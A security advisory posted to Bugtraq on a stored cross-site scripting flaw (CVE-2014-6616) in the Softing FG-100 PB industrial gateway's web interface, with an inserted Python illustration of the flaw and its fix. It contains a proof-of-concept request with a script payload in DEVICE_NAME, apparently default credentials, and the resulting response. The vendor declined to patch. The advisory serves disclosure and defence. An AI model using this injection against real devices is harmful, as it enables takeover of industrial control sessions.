Date: Wed, 5 Nov 2014 08:52:29 +0100
From: "Ingmar Rosenhagen" <ingmar.rosenhagen@...c.de>
To: <bugtraq@...urityfocus.com>
Subject: CVE-2014-6616 Softing FG-100 Webui XSS

#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:   Softing FG-100 PB
# Vendor:    Softing AG (www.softing.com)
# CVE ID:    CVE-2014-6616
# Subject:   XSS
# Risk:      High 
# Effect:    Remotely exploitable
# Author:    Johannes Klick
# 	       Daniel Marzin
# 	       Ingmar Rosenhagen
# Date:      05.11.2014 
#
#############################################################

Introduction:
-------------
Softing FG PROFIBUS [1] is a family of interfaces for remote access to
one, two or three PROFIBUS segments via Ethernet for device
parameterization, controller programming and data acquisition. The
device is used in industrial setups to make PROFIBUS devices available
via Ethernet. Compass Security Deutschland GmbH [2] discovered a security
flaw in the web GUI of the device which allows execution of malicious
code in the context of the user's browser session.

Affected:
---------
Firmware: FG-x00-PB_V2.02.0.00

Technical Description:
----------------------
The web GUI does not properly encode output of user data in at least one
place. Exploiting this vulnerability leads to stored cross-site
scripting (XSS) and allows execution of JavaScript code in the user's
browser session.

The vulnerable resource is the 'DEVICE_NAME' parameter:

POST /cgi-bin/CFGhttp HTTP/1.1
Host: 192.168.2.3
Referer: http://192.168.2.3/cgi-bin/CFGhttp

second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&
DEVICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&
IPADDR=192.168.2.3&IPADDR_ORG=192.168.2.3&
NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&
GATEWAY=0.0.0.0&GATEWAY_ORG=&
MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_ORG=192.168.212.231&STARTUP=RELOAD

Which results in the malicious code being embedded:

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache, must-revalidate
Pragma: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN""http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Device   Configuration</title></head><link
rel="stylesheet" type="text/css"
href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network
Settings</h1><table cellspacing=0 summary=""><tr><td><strong>  Host Name
</strong></td><td>  <SCRIPT>alert("XSS")</SCRIPT>  </td><td>
</td></tr><tr><td><strong>  IP Address  </strong></td><td>  192.168.2.3
</td><td>     </td></tr><tr><td><strong>  Subnet Mask
</strong></td><td>  255.255.255.0  </td><td>
</td></tr><tr><td><strong>  Default Gateway  </strong></td><td>
</td><td>     </td></tr><tr><td><strong>  Maintenance IP Address
</strong></td><td>  192.168.212.231  </td><td>
</td></tr><tr><td><strong>  New network parameters will be used
</strong></td><td>  immediately
</td><td></td></tr></table><br></body></html>
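As an added illustration (not Softing's code and not part of the advisory): a small Python model of the device's "Host Name" cell beside a hardened version that HTML-encodes the value for the element-content context and, as a second layer, validates DEVICE_NAME as a hostname before it is stored. The form body is a constructed, shortened copy of the request above.

```python
"""Stored XSS via DEVICE_NAME: the defect and two defensive layers (added example)."""
import html
import re
from urllib.parse import parse_qs

# Constructed form body, shortened from the advisory's POST to /cgi-bin/CFGhttp.
# parse_qs only treats '&', '=', '+' and '%' specially, so the raw payload survives.
SAMPLE_BODY = (
    "second_chance=Yes&LOGIN=config&SERIAL_NUMBER=0110000000"
    '&DEVICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>'
    "&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168.2.3&STARTUP=RELOAD"
)

# One DNS label as the device would need it: letters, digits, inner hyphens, max 63 chars.
_HOSTNAME_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def device_name_from_body(body: str) -> str:
    """Return the DEVICE_NAME form field, or '' when it is absent."""
    return parse_qs(body, keep_blank_values=True).get("DEVICE_NAME", [""])[0]


def render_host_name_row_vulnerable(name: str) -> str:
    """Model of the device's behaviour: the stored value is copied into HTML verbatim."""
    return f"<tr><td><strong>  Host Name  </strong></td><td>  {name}  </td></tr>"


def render_host_name_row_fixed(name: str) -> str:
    """Hardened form: encode '<', '>', '&' and quotes so the browser renders text only."""
    safe = html.escape(name, quote=True)
    return f"<tr><td><strong>  Host Name  </strong></td><td>  {safe}  </td></tr>"


def is_valid_hostname(name: str) -> bool:
    """Input-side check: reject anything that is not a plausible host name label.
    This is defence in depth; output encoding above is the fix that closes the XSS."""
    return _HOSTNAME_LABEL.match(name) is not None


if __name__ == "__main__":
    name = device_name_from_body(SAMPLE_BODY)
    print("as stored by the device:", render_host_name_row_vulnerable(name))
    print("with output encoding:   ", render_host_name_row_fixed(name))
    print("accepted as host name?  ", is_valid_hostname(name))
```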



Workaround / Fix:
-----------------
No patch is available.

Timeline:
---------
Vendor Notified:    2014-09-15 
Vendor Response:    2014-10-24    
Vendor Status:      Won't fix

References:
-----------
[1]:   http://industrial.softing.com/de/produkte/profibus-master-or-slave-configurable-single-channel-remote-interface.html
[2]:   http://www.csnc.de


